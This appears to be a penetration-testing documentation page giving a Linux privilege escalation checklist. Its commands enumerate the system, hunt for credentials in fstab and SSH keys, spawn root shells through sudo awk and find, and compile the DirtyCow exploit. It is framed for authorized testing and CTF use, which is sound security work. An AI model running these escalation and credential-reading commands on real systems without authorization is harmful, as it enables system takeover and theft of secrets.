Skip to main content

Overview

Linux is the dominant operating system in server environments, cloud infrastructure, and embedded systems. Understanding its internals is essential for both offensive security and hardening. This page covers the foundational concepts needed before diving into privilege escalation techniques.
This content is intended for authorized penetration testing, CTF competitions, and security research only. Always obtain proper written authorization before testing any system.

Privilege Escalation Checklist

The best automated tool for Linux local privilege escalation enumeration is LinPEAS.

System Information

1

Gather OS Information

Identify the operating system, kernel version, and architecture.
(cat /proc/version || uname -a) 2>/dev/null
lsb_release -a 2>/dev/null
cat /etc/os-release 2>/dev/null
2

Check PATH and Environment

Look for writable folders in PATH and sensitive data in environment variables.
echo $PATH
(env || set) 2>/dev/null
3

Search for Kernel Exploits

Check kernel version against known vulnerabilities like DirtyCow.
cat /proc/version
uname -a
searchsploit "Linux Kernel"
4

Check Sudo Version

Determine if the sudo version is vulnerable to known CVEs.
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
5

Enumerate Defenses

Identify security mechanisms in place: AppArmor, SELinux, ASLR, etc.
# AppArmor
if [ `which aa-status 2>/dev/null` ]; then aa-status; fi
# SELinux
sestatus 2>/dev/null || echo "Not found"
# ASLR
cat /proc/sys/kernel/randomize_va_space 2>/dev/null

Key Checklist Areas

  • List mounted and unmounted drives
  • Check /etc/fstab for credentials
  • Look for writable mount points
ls /dev 2>/dev/null | grep -i "sd"
cat /etc/fstab 2>/dev/null | grep -v "^#"
grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null
  • Check for useful and vulnerable software
  • Monitor running processes for privilege misconfigurations
which nmap aws nc ncat netcat wget curl python python3 perl php ruby docker lxc 2>/dev/null
dpkg -l    # Debian-based
rpm -qa    # CentOS/RHEL
ps aux
ps -ef
  • Look for writable cron scripts or PATH abuse
  • Check for wildcard injection opportunities
crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
  • Check for writable .service files
  • Look for writable binaries executed by services
  • Enumerate systemd timers
systemctl show-environment
systemctl list-timers --all
  • Identify writable Unix domain sockets
  • Check for exploitable D-Bus services
netstat -a -p --unix
nc -U /tmp/socket
  • Map the network position and open ports
  • Check for sniffable traffic
cat /etc/hostname /etc/hosts /etc/resolv.conf
(ifconfig || ip a)
(netstat -punta || ss --ntpu)
timeout 1 tcpdump
  • Enumerate all users, groups, and superusers
  • Check clipboard and password policy
id || (whoami && groups) 2>/dev/null
cat /etc/passwd | cut -d: -f1
awk -F: '($3 == "0") {print}' /etc/passwd
grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs
  • Review sudo permissions with GTFOBins
  • Find exploitable SUID binaries
sudo -l
find / -perm -4000 2>/dev/null
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;
  • Check for unexpected Linux capabilities
  • Look for unusual ACLs on files
getcap -r / 2>/dev/null
getfacl /etc/passwd 2>/dev/null
  • Review SSH configuration and keys
  • Search profile files, shadow, and backup files
cat ~/.ssh/id_rsa 2>/dev/null
ls -la ~/.ssh/
find / -name "*.bak" -o -name "*.old" 2>/dev/null | head -20

Linux Security Mechanisms

AppArmor

Mandatory access control system that restricts program capabilities using per-program profiles.

SELinux

Security-Enhanced Linux provides fine-grained mandatory access control policies for processes and files.

ASLR

Address Space Layout Randomization randomizes memory addresses to mitigate memory exploitation.

Capabilities

Linux capabilities split root privileges into distinct units that can be independently granted.

CVE-2016-5195 (DirtyCow)

A classic kernel privilege escalation vulnerability affecting Linux kernels up to 3.19.0-73.8. 
# Make DirtyCow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

References

Build docs developers (and LLMs) love

Get started for freeTalk to us